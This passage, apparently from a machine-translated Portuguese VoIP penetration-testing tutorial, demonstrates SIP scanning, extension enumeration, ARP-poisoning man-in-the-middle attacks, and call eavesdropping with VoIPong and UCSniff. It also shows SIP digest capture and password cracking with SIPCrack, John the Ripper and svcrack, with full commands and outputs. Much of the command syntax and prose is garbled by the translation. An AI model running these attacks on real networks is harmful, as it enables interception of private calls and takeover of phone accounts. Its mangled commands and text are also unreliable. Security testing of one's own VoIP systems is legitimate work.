-T NMERO o nmero mximo de caracteres na lixeira em modo aleatrio
(Default: comprimento pedido)
-L PORT a porta local para usar (padro: qualquer)
-R PORT a porta remota para usar (padro: 5060)
-P-alvo pedido HOSTNAME (proxy de sada)
-H HOSTNAME substitui o nome do host local em todos os cabealhos
-M NMERO o valor para o campo de cabealho max-encaminha
-N usar FQDN em vez de IPs na Via-Line
-I desactivar a insero de uma Via-Line
-Uma senha senha para autenticao
(Se omitido senha = "")
-U username autenticao STRING
-D ignorar redirecionamentos
-V cada v produz mais de verbosidade (mx. 3)
-W IP extrato do aviso de resposta
-G substituio de string para uma marca especial na mensagem
-G activa substituio de variveis
-N retorna cdigos de sada compatvel com Nagios
-Q busca STRING para um RegExp em respostas e retorno de erro
em caso de falha
-W NMERO retorno aviso Nagios se retrans nmero>
B-STRING enviar uma mensagem com a corda como corpo
-O valor STRING Content-Disposition
-P Number Nmero de processos para iniciar
-Um nmero NMERO dos testes de impresso e apenas timings
-S usar mesma porta para receber e enviar
-C SIPURI usar o uri dada como em De MENSAGEM
-D multiplicador tempo limite para transaes NMERO INVITE
e transportes confiveis (padro: 64)
-E STRING especificar o transporte para ser utilizado
-J STRING adiciona cabealhos adicionais para o pedido

Aqui est um exemplo para utilizar a impresso digital sipsak um dispositivo SIP
Podemos ver no resultado que o dispositivo que consultado umaAudiocodes
MP-114 FXS gateway.

root @ bt: ~ # sipsak-vv-s sip: 192.168.1.221


mensagem recebida:
SIP/2.0 200 OK
Via: SIP/2.0/UDP 127.0.1.1:51601; ramo = z9hG4bK.18a1b21f; rport;
apelido
De: SIP: sipsak@127.0.1.1: 51601; tag = 97ac9e5
Para: sip: 192.168.1.221; tag = 1c1785761661
Call-ID: 159042021@127.0.1.1
CSeq: 1 OPES
Contato:
Apoiado: em, 100rel, timer, substitui, caminho, recurso prioridade
Permitir: CADASTRE-SE, OPES, INVITE, ACK, CANCEL, BYE, notificar,
PRACK, REFER, INFO, INSCREVA, UPDATE
Servidor: Audiocodes-Sip-Gateway-MP-114 FXS/v.5.40A.040.005
X-Recursos: telchs = 4/0; mediachs = 0/0
Accept: application / sdp, application / simples mensagem de resumomensagem, / sipfrag
Content-Type: application / sdp
Content-Length: 343
v = 0
o = 1785763980 1785763858 AudiocodesGW IN IP4 192.168.1.221
s = telefonema
c = IN IP4 192.168.1.221
t = 0 0
m = audio 6000 RTP / AVP 18 8 0 127
a = rtpmap: 18 G729/8000
a = fmtp: 18 annexb = no
a = rtpmap: 8 PCMA/8000
a = rtpmap: 0 PCMU/8000
a = rtpmap: 127 telephone-event/8000
a = fmtp: 127 0-15
um ptime =: 20
um sendrecv =
uma RTCP =: 6001 IN IP4 192.168.1.221

Responder ** recebidas aps 67,923 ms **


SIP/2.0 200 OK
final recebida

SIPScan
Sip-scan um scanner simples para os anfitries SIP pode digitalizar um nico
host ou uma sub-rede inteira.

Sip-scan uso:

root @ bt :/ pentest / voip / sipscan # / sip-scan -. ajudar


. / Sip-scan verso [desconhecido] chamado Getopt :: Std :: getopts
(verso 1.05),
execuo em Perl verso 5.10.0.
Uso: SIP-scan [options]
-V ser detalhada.
Ip-i | se Interface / IP para SIP-headers (padro: IP da ppp0)
-P porta porta remota para digitalizar. (Default: 5060)
-L origem porta local de pacotes. (Default: 5060)
-Dn [p] Espere n ms aps cada pacote enviado (padro: 50ms) ou se 'p'

dado, enviar pacotes por segundo (n default: 20)


Espera-wn n ms de respostas remanescentes (padro: 2000ms)
Rede de especificao contm o curinga * ou nm intervalos.

Digitalizao de uma sub-rede:

root @ bt :/ pentest / voip / sipscan # . / sip-scan-i eth0


192.168.1.1-254
192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.22: Asterisk PBX
192.168.1.104: Asterisk PBX
192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055
192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.175: PABX Asterisk 1.6.0.9-samy-R27
192.168.1.219: "Exelmind Interruptor de controlo de chamadas (CAC)"
192.168.1.248: MailVision HostLynx/2.1 "GA"

SVMAP
SVMAP uma parte de um conjunto de ferramentas chamado SIPVicious e o
meu scanner favorito de escolha Pode ser usado para escanear e identificar
impresses digitais de um nico IP ou um intervalo de endereos IP. Svmap
permite especificar o mtodo de solicitao que est sendo usado para a
digitalizao, o mtodo padro OPES, ele oferece de depurao e opes de
verbosidade e at mesmo permite digitalizar os registros SRV para SIP no domnio
de destino. Voc pode usar o /. svmap-h para ver todos os argumentos
disponveis

root @ bt :/ pentest / voip / sipvicious # . / svmap.py


Uso: svmap.py [options] host1 host2 hostrange
exemplos:
svmap.py 10.0.0.1-10.0.0.255 \
> 172.16.131.1 sipvicious.org/22 10.0.1.1/24 \
> 1.1.1.1-20 1.1.2-20. * 4.1. *. *
svmap.py-s session1 - randomize 10.0.0.1 / 8
svmap.py - resume session1-v
svmap.py-p5060-5062 10.0.0.3-20-m CONVIDAR

A digitalizao de uma faixa de IP:

root @ bt :/ pentest / voip / sipvicious # . / svmap.py 192.168.1.1254


| Dispositivos SIP | User Agent | impresso digital |
-------------------------------------------------- | 192.168.1.104:5060 | Asterisk PBX | desativado |
| 192.168.1.103:5060 | Twinkle/1.4.2 | desativado |

Permitindo a digitalizao fingerprinting

root @ bt :/ pentest / voip / sipvicious # . / svmap.py 192.168.1.1254 - fp

Enumerao Extenses
Enumerao de extenso podem ajudar um invasor por encontrar extenses
vlidos em um sistema de VoIP que mais tarde pode levar a um ataque de fora
bruta sobre as contas SIP. Enumerao de extenso funciona por erros
examinando retornados por mtodos SIP pedidos como REGISTO, Opes e
CONVIDAR

Svwar
Svwar tambm uma ferramenta da sute sipvicious permite enumerar as
extenses usando uma variedade de extenses ou usando um arquivo de
dicionrio svwar suporta todos os principais dos trs mtodos de extenso de
enumerao como mencionado acima, o mtodo padro para a enumerao o
registo.
Uso:

root @ bt :/ pentest / voip / sipvicious # . / svwar.py


Uso: svwar.py [options] alvo
exemplos:
svwar.py-e100-999 10.0.0.1
svwar.py-d dictionary.txt 10.0.0.2

Exemplo:

root @ bt :/ pentest / voip / sipvicious # . / svwar.py-e100-400


192.168.1.104
| Extenso | Autenticao |
-----------------------------| 201 | reqauth |
| 200 | reqauth |
| 203 | reqauth |
| 202 | reqauth |
| 303 | reqauth |
| 305 | reqauth |

Svwar identificou todas as extenses que eu criei no meu servidor Trixbox. Voc
pode especificar outro mtodo sip usando o m-argumento, voc tambm pode
adicionar t-v ou-vv para uma verbosidade.

root @ bt :/ pentest / voip / sipvicious # . /


192.168.1.104-m CONVIDAR-v
INFO: TakeASip: tentando obter ip auto .. pode
INFO: root: liguem seus motores
INFO: TakeASip: dispositivo SIP Ok encontrado
INFO: TakeASip: extenso '200 'existe - requer
INFO: TakeASip: extenso '201 'existe - requer
----- Edit ---INFO: TakeASip: extenso '203 'existe - requer
INFO: TakeASip: extenso '303 'existe - requer
INFO: TakeASip: extenso '303 'existe - requer
INFO: TakeASip: extenso '305 'existe - requer
INFO: root: temos 6 extenses
| Extenso | Autenticao |
-----------------------------| 201 | reqauth |
| 200 | reqauth |
| 203 | reqauth |
| 202 | reqauth |
| 303 | reqauth |
| 305 | reqauth |

svwar.py-e100-400
demorar um pouco

autenticao
autenticao
autenticao
autenticao
autenticao
autenticao

INFO: root: Tempo total: 0:00:21.944731

Enumiax
Enumiax usada para enumerar nomes de usurios de protocolo Asterisk
Exchange. Ela permite a um ataque de dicionrio ou um nome de usurio
seqencial Adivinhar
root @ bt :/ pentest / voip / enumiax # . / enumiax
enumIAX 1,0
Dustin D. Trammell
Uso: enumiax [options] alvo
opes:
-D
Ataque de dicionrio usando arquivo
-I
Intervalo para o auto-save (nmero de operaes, padro 1000)
-M # nome de usurio comprimento mnimo (em caracteres)
-M # nome de usurio comprimento mximo (em caracteres)
-R # limite de taxa de chamadas (em microssegundos)
-S
Leia o estado da sesso de arquivo de estado
-V verbosidade Aumento (repetio de detalhamento adicional)
V-informaes sobre a verso de impresso e sada
-H Imprimir informaes de ajuda / utilizao e sair

root @ bt :/ pentest / voip / enumiax # . / enumiax-v-m3-M3


192.168.1.104
enumIAX 1,0
Dustin D. Trammell
Alvo Aquired: 192.168.1.104
Conectando-se via 192.168.1.104 udp na porta 4569 ...
Iniciando processo enum em: Sb 05 fevereiro 2011 13:04:18
Agora trabalhando em 3 nomes de personagens ...
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
...

# # #
"000"
# # #
"001"
# # #
"002"
# # #
"003"
# # #
"004"
# # #
"005"
# # #
"006"
# # #
"007"
# # #
"008"
# # #

# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # #

root @ bt :/ pentest / voip / enumiax # . / enumiax-d dict-v


192.168.1.104
enumIAX 1,0
Dustin D. Trammell
Alvo Aquired: 192.168.1.104
Conectando-se via 192.168.1.104 udp na porta 4569 ...
Iniciando processo enum em: Sb 05 fevereiro 2011 13:02:39
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:
# # # # # # # # #
Tentando usurio:

# # # # #
"guest"
# # # # #
"iaxtel"
# # # # #
"iaxtel2"
# # # # #
"100"
# # # # #
"101"
# # # # #
"200"
# # # # #
"201"

# # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # #

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
Tentando usurio: "202"
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
Tentando usurio: "203"
End of file dicionrio alcanado, de sair.

Monitoramento de trfego e chamadas telefnicas


Eavesdropping
Monitorar o trfego VoIP pode permitir que um invasor capturar pedidos SIP e RTP
dados enviados de clientes para o servidor e de volta. Ele pode servir a dois
vetores de ataque:

Captura de autenticao SIP (que mais tarde ir discutir este tema na seo
autenticao atacar).

Escutas usurios telefonemas.


Para fins de demonstrao, vamos utilizar o seguinte cenrio:

Para este vetor de ataque que ser necessrio executar um homem no ataque do
meio, que exigir os seguintes passos:

Arp envenenamento / spoofing

Sniffing trfego

Decodificao RTP dados para um arquivo de udio.

ARP Poisoning usando arpspoof


Antes de podermos comear a farejar o trfego precisaremos arp veneno nosso
switch / gateway, estaremos usando uma ferramenta chamada "arpspoof" que est
localizado em "/ usr / sbin / arpspoof" pasta no Backtrack, na verdade, voc pode
simplesmente cham-lo de qualquer lugar, digitando: arpspoof Antes de
podermos usar arpspoof precisaremos habilitar o encaminhamento de IP:
root @ bt: ~ # echo 1> / proc/sys/net/ipv4/ip_forward

Sintaxe arpspoof deve olhar como se segue:

root @ bt: ~ # arpspoof


Verso: 2.4
Uso: arpspoof [-i interface] [-t-alvo] host

Para um ataque MITM sucesso teremos de falsificar nos dois sentidos:

arpspoof-t gateway de vtima


arpspoof-t vtima de gateway

Vamos deixar o nosso envenenamento Arp executado em segundo plano


enquanto executa uma captura usando o Wireshark.

Capturando o trfego e Espionagem usando o Wireshark


Agora vamos acionar o Wireshark para capturar algum trfego. Ns vamos usar o
filtro de captura Wireshark seguinte:
no transmitir e no multicast e host 192.168.1.118

Agora vamos comear a capturar algum trfego ... Enquanto sniffing para o trfego
do usurio "B" lanou o telefone X-Lite macio em seu computador de mesa e
discou para o ramal do usurio "A" 200.

Wireshark capturou algum trfego, depois de um tempo eu parei o processo de


captura e salva as sesses em um arquivo chamado "sip.pcap".

Podemos ver que ns capturamos o trfego SIP, mas para esta seo, esto mais
interessados no trfego RTP, pois contm os dados reais de conversao.

Wireshark possui um recurso muito legal para decodificar capturado chamadas


VoIP dados em formato de udio jogvel Voc pode encontrar esse recurso
nas Estatsticas -> VoIP Calls menu.

VoIPong
VoIPong um utilitrio que detecta todas as chamadas de voz sobre IP em um
gasoduto, e para aqueles que esto G711 codificado, dumps de conversao real
para arquivos de onda distintos. Ele suporta SIP, H323, protocolo da Cisco Skinny
cliente, RTP e RTCP. VoIPong est localizado em Backtrack "/ pentest / voip /

voipong" diretrio Antes de podermos usar VoIPong teremos de fazer algumas


alteraes para o arquivo voipong.conf:
root @ bt :/ pentest / voip / voipong # etc nano / voipong.conf
soxpath = / usr / bin / sox
networksfile = / pentest / voip / voipong / etc / voipongnets
OutDir = / pentest / voip / voipong / sada /
device = eth0 # seu nome de rede placa de interface

Agora podemos comear a VoIPong para capturar algumas conversas VoIP

root @ bt :/ pentest / voip / voipong # . / etc voipong-c /


voipong.conf-d4-f

Uma vez VoIPong detecta um telefonema ele vai comear a captur-lo, uma vez
que terminar de VoIPong vai parar o processo de captura e ir torn-lo para um
arquivo de onda jogvel. Toda a conversa ser salva no "/ pentest / voip / voipong /
output" pasta

Jogando o arquivo:

Vomitar
Vomit converte um telefone IP Cisco conversa RTP em um arquivo de onda que
pode ser jogado com jogadores de som comuns. Vomit exige um tcpdump arquivo

de sada. A fim de obter vomitar e funcionando, ser necessrio baixar e instalar


waveplay Obtenha
aqui:http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay20010924.tar.gz.5731.html
root @ bt: ~ # tar-xzvf waveplay 20010924.tar.gzwaveplay-20010924 /
waveplay-20010924/Makefile
waveplay-20010924/waveplay.c
waveplay-20010924/waveplay.ja.1
waveplay-20010924/wavefmt.h
waveplay-20010924/README
waveplay-20010924/waveplay.1
waveplay-20010924/README.jp
root @ bt: ~ # cd waveplay-20010924
root @ bt: ~ / waveplay-20010924 # fazer
cc-c-o waveplay.o waveplay.c
cc waveplay waveplay.o-
root @ bt: ~ waveplay-20010924 / # cp waveplay / usr / bin /
root @ bt :/ pentest / voip / vmito # / vmito-r sip.dump |.
waveplay-S8000-B16-C1

UCsniff
UCSniff um VoIP e IP Vdeo ferramenta de Avaliao de Segurana, que integra
software de cdigo aberto existente em vrias caractersticas teis, permitindo
VoIP e proprietrios de Vdeo IP e os profissionais de segurana para rapidamente
testar a ameaa de VoIP no autorizado e Espionagem Vdeo . UCSniff suporta
envenenamento Arp, VLAN Hopping, VLAN Descoberta via CDP, ele tem uma
capacidade de farejadores e muito mais ... eu considero-o como um tudo em uma
ferramenta de escutas. Vamos dar uma olhada em alguns exemplos de uso:
UCSniff pode operar em 2 modos

Monitor mode - Deve ser usado em uma mdia compartilhada, onde os

telefones IP conectados a ou seja: um HUB, ponto de acesso sem fio, ele tambm
pode ser usado em um ambiente comutado atravs da criao de algumas
sesses SPAN em um switch Cisco.

Homem no modo mdio - Este modo tem 2 modos adicionais que so

Modo de aprendizagem

Modo alvo

Preparando UCSniff para que possamos execut-lo a partir de qualquer


localizao no backtrack:
root @ bt :/ tmp # cd instalar

Usage Monitor Modo

root @ bt :/ tmp / ucsniff # ucsniff-i eth0-M


UCSniff 2,1 de partida
Correndo em Modo Monitor
Diretrio do users.txt no pode ser aberto para leitura no diretrio
de trabalho
Targets.txt arquivo no pode ser aberto para leitura no diretrio de
trabalho
Ouvir em eth0 ... (Ethernet)
eth0 -> 00:00 C: 29:84:98: B2 192.168.1.105 255.255.255.0
Comeando Unificado cheirar ...
Ateno: Certifique-se que voc bateu 'q' quando tiver terminado com
este programa.
Aviso: 'q' re-ARPs as vtimas. No faz-lo antes de sair do programa
ir resultar em uma negao de servio.
SIP Chamada em curso. (Ramal 200, ip 192.168.1.104) chamada (ramal
201, ip 192.168.1.118)
SIP Chamada em curso. (Ramal 200, ip 192.168.1.105) chamada (ramal
201, ip 192.168.1.104)
SIP chamada terminou. Conversa gravada no arquivo '200-chamada-201-5
:2:7-3-ambos. Wav '
SIP chamada terminou. Conversa gravada no arquivo '200-chamada-201-5
:2:8-2-dois. Wav '
Fechando interface de texto ...
Unified sniffing foi interrompido.

Ns podemos parar as sesses, pressionando a tecla Q.


Vrios arquivos foram criados por UCSniff: Os arquivos de log - Contm
informaes detalhadas sobre os arquivos saborear transaes pcap - arquivo de
captura que pode ser visto em arquivos de udio wav Wireshark - arquivos de
udio de conversa
root @ bt :/ tmp / ucsniff # ls-l

total de 376
-Rw-r - r -. 1 root root 40854 05 de fevereiro 05:02 200 Chamar-201-5
:2:7-3-tanto wav
-Rw-r - r -. 1 root root 115818 05 fevereiro 05:02 200 Chamar-201-5
:2:7-3 pcap
-Rw-r - r -. 1 root root 46294 05 de fevereiro 05:02 200 Chamar-201-5
:2:8-2-wav tanto
-Rw-r - r -. 1 root root 103940 05 fevereiro 05:02 200 Chamar-201-5
:2:8-2 pcap
-Rw-r - r - 1 root root 278 05 fevereiro 05:02 call_detail_log
-Rw-r - r - 1 root root 317 05 fevereiro 05:02 call_log
-Rw-r - r - 1 root root 10063 05 de fevereiro 05:02 sip.log
-Rw-r - r - 1 root root 39073 05 de fevereiro 05:02 sipdump.pcap
-Rw-r - r - 1 root root 0 05 de fevereiro 05:01 skinny_log

MITM Modo de Utilizao Aprendizagem


Este modo usa um protocolo de sinalizao (SIP, Skinny) para mapear a extenso
de um endereos IP. Voc pode personalizar as metas a apenas interceptar
endereos IP especficos ou redes. No exemplo a seguir, vamos imaginar que
esto na VLAN VoIP UCSniff vai Arp envenenar todos os hosts da sub-rede.
root @ bt :/ tmp / ucsniff # ucsniff-i eth0 / / / /
UCSniff 2,1 de partida
Ouvir em eth0 ... (Ethernet)
eth0 -> 00:00 C: 29:84:98: B2 192.168.1.105 255.255.255.0
Randomizao 255 hosts para escaneamento ...
Digitalizao a mscara inteira para 255 anfitries ...
* | ================================================ ==> | 100,00%
Envenenamento vtimas ARP:
GRUPO 1: Qualquer (todos os hosts na lista)
GRUPO 2: Qualquer (todos os hosts na lista)
Entrada de destino mapeado novo: (IP: 192.168.1.118) -> ramal 201 eo
nome: entrada de destino mapeado novo: (IP: 192.168.1.104) -> ramal
200 eo nome:
SIP Chamada em curso. (Ramal 201, ip 192.168.1.118) chamada (ramal
200, ip 192.168.1.104)
SIP chamada terminou. Conversa gravada no arquivo '201-chamada-200-5
:13:4-2-dois. Wav '
Fechando interface de texto ...
ARP envenenador desativado.
RE-ARPing as vtimas ...
Unified sniffing foi interrompido.

Se dermos uma olhada em arquivos de log UCSniff podemos ver os alvos


descobertos utilizados no ataque.

root @ bt :/ tmp / ucsniff # cat targets.txt


192.168.1.118,201, gole
192.168.1.104,200, gole

MITM Target Mode


Target Mode permite Eavesdropping em uma camada superior apenas ao acaso
fluxos de udio ou o endereo IP de telefones para os quais voc no sabe a
extenso. Este modo tem 2 modos secundrios: Usurio Targeted alvejado
Conversa Podemos acrescentar metas manualmente para o arquivo "targets.txt"
no seguinte formato: xxxx, extenso, 192.168.1.118,201 gole, gole ou usar o modo
de aprender a auto descobrir hospedeiros
root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T
UCSniff 2,1 de partida
Targets.txt arquivo no pode ser aberto para leitura no diretrio de
trabalho
No h metas foram previamente descobertos no arquivo de Metas,
targets.txt
Por favor, execute UCSniff no modo de aprendizagem, ou editar
manualmente targets.txt

Uma vez que um arquivo targets.txt vlido for encontrado ser pedido para
escolher um modo de escuta:

root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T


UCSniff 2,1 de partida
Analisadas 2 entradas no arquivo de Metas, targets.txt
UCSniff executado no modo de alvo. Analisado 2 alvos previamente
descobertos
Por favor seleccione um modo de Eavesdropping segmentado:
1. Usurio
Descrio: escutar todas as chamadas para ou de um determinado ponto
de extremidade.
2. Conversa
Descrio: Eavesdrop sobre os fluxos bi-direcionais de conversao
entre dois pontos selecionados.
Por favor, selecione a opo (1) ou (2):

Selecionando "Usurio", conta a ferramenta para interceptar todo o trfego entre o


alvo um lado, eo resto da rede.

Em "Conversa", dois pontos so selecionados ea rede ARP envenenadas para


apenas interceptar o trfego entre esses dois usurios.

UCSniff inclui ferramentas mais teis e ataques modos como VLAN hopping
(usando ACE), que sero discutidas mais tarde.

Xplico
Embora Xplico no est no diretrio Backtrack ferramentas de VoIP, uma
ferramenta muito til para capturar trfego SIP e RTP (entre outros
protocolos). Xplico pode ser encontrado no Backtrack -> Digital Forensics ->
Anlise Forense de menu

No caso, no est presente em sua instalao Backtrack voc pode simplesmente


instal-lo, emitindo o seguinte comando:
root @ bt: ~ # apt-get install xplico

Xplico pode ser usado para capturar o trfego ao vivo ou importar um arquivo de
captura Wireshark PCAP. De qualquer maneira Xplico ir decodificar os pacotes
capturados e mont-los para o formato apropriado No nosso caso ser SIP e
RTP. Depois de executar Xplico voc ser solicitado a fazer o login, o nome de
usurio ea senha padro so: xplico

Uma vez que tenhamos sucesso logado para Xplico vamos precisar para criar um
caso

Ns ser solicitado a escolher entre uma captura vivo ou importar um arquivo


PCAP Neste exemplo, usaremos Xplico para executar uma captura ao vivo (vamos
Arp envenenar os nossos objectivos no plano de fundo usando arpspoof). Agora
teremos que escolher o nosso caso e criar uma nova sesso

Ao escolher a nossa sesso recm-criado, vamos ver a nossa pgina de


estatsticas principal com a opo de escolher o nosso adaptador de rede e iniciar /
parar o processo de captura.

Aqui est um exemplo para o trfego capturado SIP:

Um exemplo para a RTP trfego decodificado:

Capturando Autenticao SIP usando SIPDump


SIPDump uma parte das ferramentas SIPCrack suite, que permite a realizao
de uma captura ao vivo de resposta SIP Digest autenticao ou pode despejar
algumas sesses previamente capturados de um arquivo PCAP. Uso SIPDump:
root @ bt :/ pentest / voip / sipcrack # . / sipdump-i eth0
SIPdump 0,3 (MaJoMu | www.codito.de)
--------------------------------------Uso: sipdump [OPES]
= Arquivo onde logins capturadas sero gravadas
Opes:
-I = Interface para escutar
-P
= Usar arquivo de dados pcap
-M = inserir dados de login manualmente
-F ""= Conjunto libpcap filtro
* Voc precisa especificar arquivo de despejo

Viva capturar utilizando SIPDump:

root @ bt :/ pentest / voip / sipcrack # . / auth.txt sipdump-i eth0


SIPdump 0,3 (MaJoMu | www.codito.de)
--------------------------------------* A utilizao de 'eth0' dev para cheirar

*
*
*
*

Comeando
Despejado
Despejado
Despejado

a farejar com 'TCP ou UDP


de login de 192.168.1.104
de login de 192.168.1.104
de login de 192.168.1.104

ou
->
->
->

vlan "filtro de pacotes


192.168.1.111 (User: '200 ')
192.168.1.111 (User: '200 ')
192.168.1.111 (User: '200 ')

Dumping dados de autenticao de um arquivo PCAP

root @ bt :/ pentest / voip / sipcrack # . / sipdump-p / root /


registration.pcap auth.txt
SIPdump 0,3 (MaJoMu | www.codito.de)
--------------------------------------* Utilizando pcap arquivo "/ root / registration.pcap" para cheirar
* Comeando a farejar com 'TCP ou UDP ou vlan "filtro de pacotes
* Despejado de login de 192.168.1.104 -> 192.168.1.101 (User: '200 ')
* Saindo, inalado 1 logins

SIPDump vai escrever a resposta de desafio de autenticao para o arquivo


especificado que o seguinte:

192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44
b80d16""""MD5"8edc2d549294f6535070439fb069c968

Vamos disscuss rachaduras estes desafios no captulo autenticao atacar.

Atacando de autenticao
SIP pode ser suscetvel a 2 tipos de ataques de autenticao, antes de tomarmos
uma olhada nestes ataques tipos vamos entender como um registro do SIP e do
processo de autenticao ocorre. SIP utiliza uma autenticao Digest que um
mecanismo que usa o protocolo HTTP e conhecido como HTTP digest. Porque o
SIP um protocolo baseado em ASCII os detalhes de autenticao esto em
hash, a fim de impedi-los de transportar em texto claro. Quando um cliente SIP
(User Agent) quer autenticar com um servidor SIP, o servidor gera e envia um
desafio para anlise para o cliente, ele contm os seguintes parmetros:

Realm - usado para identificar credenciais dentro como mensagem SIP,


geralmente o gole de domnio. Nonce - esta uma string md5 nico que
gerado pelo servidor para cada pedido de registro feito a partir de um carimbo de
tempo e uma frase secreta para garantir que tem um tempo de vida limitado e no
podia ser ser utilizados de novo. Uma vez que o cliente recebe o desafio digerir e
que o usurio digita suas credenciais o cliente usa o nonce para gerar uma
resposta digest e envia de volta para o servidor.

Com isso dito, vamos tentar decifrar a resposta digest, a fim de obter uma senha
de conta vlido SIP.

Cracking SIP Digest resposta hashes


Backtrack fornece uma grande ferramenta chamada SIPCrack, Ns j discutimos
como capturar um vlido autenticao SIP resposta digest usando
SIPDump. SIPCrack pode ser encontrada na
root @ bt :/ pentest / voip / sipcrack #

Uso SIPCrack:

root @ bt :/ pentest / voip / sipcrack # . / sipcrack


SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------Uso: sipcrack [OPES] [-s |-w ]
Logins = arquivo contendo rastreados por SIPdump
Opes:
-S = usar stdin para senhas
-W wordlist = arquivo contendo todas as senhas para tentar
-P num = processo de impresso a cada quebra senhas N (para-w)
(ATENO: diminui muito)
* Ou-w ou-S tem de ser dado

SIPCrack pode operar em dois modos:

Dicionrio ataque

STDIN

Dicionrio ataque
Backtrack fornece alguns dicionrios bsicos que esto localizados em:
root @ bt :/ pentest / senhas / wordlists

Mas, para efeitos do presente artigo, vou usar uma outra ferramenta na grelha
backtrack Crunch chamado que usado para criar dicionrios
personalizados. Vamos usar crise para criar um seis caracteres Crunch dicionrio
numrico est localizado em:

root @ bt :/ pentest / senhas / triturao #

Uso Crunch:

uso: crise
[-F / caminho / para / charset.lst charset-name] [-o
wordlist.txt] [-t [FIXO] @ @ @ @] [-s startblock] [nmero-c]

Para uso crise detalhada verificar seu manual:

root @ bt :/ pentest / senhas / triturao # crise de homem

Criando um dicionrio seis caracteres numricos:

root @ bt :/ pentest / senhas / triturao # . / crise 6 6-f


charset.lst numrico-o / pentest / voip / sipcrack / sipass.txt
Crunch agora gerar 7000000 bytes de dados
Crunch agora vai gerar 6 MB de dados
Crunch agora gerar 0 GB de dados
100%

Usaremos um credenciais capturados anteriormente saborear armazenados por


SIPDump no auth.txt arquivo ans sipass.txt como o dicionrio (que criamos
utilizando crunch)
Desvendando o Response Digest:

root @ bt :/ pentest / voip / sipcrack # . / sipcrack-w sipass.txt


auth.txt
SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------* Encontrado Contas:
Num servidor Hash Usurio do Cliente | Senha
1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd
* Selecione quais a entrada de crack (1 - 1): 1
* Gerando hash MD5 esttica ... 0a84f78fde66bb15197eab961462dc2f
* A partir bruteforce contra o usurio '200 '(MD5: '3
a33e768ed6f630347f4b511371926bd')
* Wordlist Loaded: 'sipass.txt'
* A partir bruteforce contra o usurio '200 '(MD5: '3
a33e768ed6f630347f4b511371926bd')
* Tentei 123457 senhas em 0 segundos
* Senha Encontrado: '123456 '
* Atualizando arquivo de despejo 'auth.txt' ... feito

Ataque de fora bruta usando o John The Ripper


Para este modo de ataque estaremos usando John The Ripper, para redirecionar a
sada johns no arquivo FIFO que vamos alimentar SIPCrack.Criando um arquivo
FIFO:
root @ bt :/ tmp # mkfifo sipcrack

Gerando senhas usando john e redirecionando a sada para o nosso arquivo FIFO,
para este exemplo vamos gerar at 6 dgitos somente.

root @ bt: ~ # john


[*] Este script ir lev-lo para / pentest / senhas / jtr /
[*] A partir da, executar. / John
root @ bt :/ pentest / senhas / JTR # / john -. incremental = dgitos
stdout-= 6> / tmp / sipcrack

Usando nosso arquivo FIFO para quebrar a senha:

root @ bt :/ pentest / voip / sipcrack # . / sipcrack-w / tmp /


sipcrack auth.txt
SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------* Encontrado Contas:
Num servidor Hash Usurio do Cliente | Senha
1 192.168.1.111 192.168.1.104 200 8edc2d549294f6535070439fb069c968
* Selecione quais a entrada de crack (1 - 1): 1
* Gerando hash MD5 esttica ... 0a84f78fde66bb15197eab961462dc2f
* A partir bruteforce contra o usurio '200 '(MD5: '8
edc2d549294f6535070439fb069c968')
* Wordlist Loaded: '/ tmp / sipcrack'
* A partir bruteforce contra o usurio '200 '(MD5: '8
edc2d549294f6535070439fb069c968')
* Tentei 3 senhas em 0 segundos
* Senha Encontrado: '123456 '
* Atualizando arquivo de despejo 'auth.txt' ... feito

Contas por fora bruta SIP


Podemos usar svcrack que uma parte do sipvicious sute de ferramentas para
a fora bruta saborear as contas de uma nica conta SIP ataque de dicionrio
(Voc pode adicionar um v ou-vv para uma verbosidade):
root @ bt :/ pentest / voip / sipvicious # . / svcrack.py-U200-d
192.168.1.104 wordlist.txt
| Extenso | Senha |
-----------------------| 200 | 123456 |

Um bruto nica conta SIP forando:

root @ bt :/ pentest / voip / sipvicious # . / svcrack.py-U200r100000-999999 192.168.1.104


| Extenso | Senha |
-----------------------| 200 | 123456 |

Use. / Svcrack-h para todos os argumentos disponveis.

VLAN Hopping
Normalmente, o trfego de VoIP est conectado a uma VLAN dedicada (Virtual
LAN), como vimos na seo topologias. Isto significa que no podemos interceptar
o trfego de VoIP por cheirar e envenenamento Arp. A razo para isso que uma
VLAN como uma rede separada, ela tem seu prprio domnio de broadcast e
faixa de IP diferente da rede de dados. VLAN hopping uma forma de "salto" para
outra VLAN, para nossa sorte Backtrack inclui as ferramentas necessrias para
